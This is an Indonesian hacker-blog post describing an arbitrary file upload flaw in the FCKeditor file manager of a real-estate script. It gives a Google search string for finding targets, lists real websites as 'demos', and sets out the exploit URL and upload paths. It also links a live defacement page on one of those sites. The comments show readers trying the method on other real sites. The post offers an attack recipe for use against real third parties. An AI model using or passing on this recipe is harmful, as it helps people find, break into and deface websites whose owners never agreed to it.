Home / Vuln / FCKEditor Vulnerability
unledeq

FCKEditor Vulnerability

Author : KaCaK
HomePage : http://www.griadamlar.com
Web App.Name : MEFE EMLAK SCRIPT
Price : N/A
Version : N/A
Software: http://emlak.mefe.net/
Vulnerability Style : File Upload
Bug : File Upload
Google Keyword : inurl:advert_detail.php?id=

Demos :
http://www.emlax.de/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.dogoturizm.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

http://www.atlantagrup.com/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

Explotation|(FCKeditor) Artibary File Upload :
http://$Site/admin/FCKeditor/editor/filemanager/browser/default/browser.html?Type=File&Connector=connectors/php/connector.php

File Uploaded Link :
http://$site/$path/files
http://$site/files

Live Preview :

http://www.emlax.de/files/binushacker/binushacker.html

./BinusHacker Defacement

About acizninja

It's all about 4rt, not how smart you are

Check Also

php-s3-appo

PHP S3 Appro [Japanese Sites] Vulnerability

Assalamualaikum sahabat B|H, Baik aja ya semoga, karena hari ini saya mau posting seputar proof …

9 comments

  1. deface yah ??
    waduh,,, hahahayy
    ManTAP GAN ..

  2. gan…. formatnya kaya gini apa nggak? http://www.alperenemlak.biz/files/endonesamerdeka.htm

    kok pas diakses error mulu ya?

    atas jawabanya terima kasih..

  3. @ Elnewbie : Untuk situs yg agan maksud FCKEditor sudah tidak Vuln…
    karena ga ada permissions untuk membuat file ataupun membuat folder baru

  4. @acizninja :

    ohh… gt… thx jwbanya…

  5. nemu aja ya…
    Mantaf

  6. Liat2 duank.absen mas bro.

  7. @dujonk : silakan lihat di binus hacker, koneksi saya lagi gag mendukung 🙁

Tinggalkan Balasan

Alamat surel Anda tidak akan dipublikasikan. Ruas yang wajib ditandai *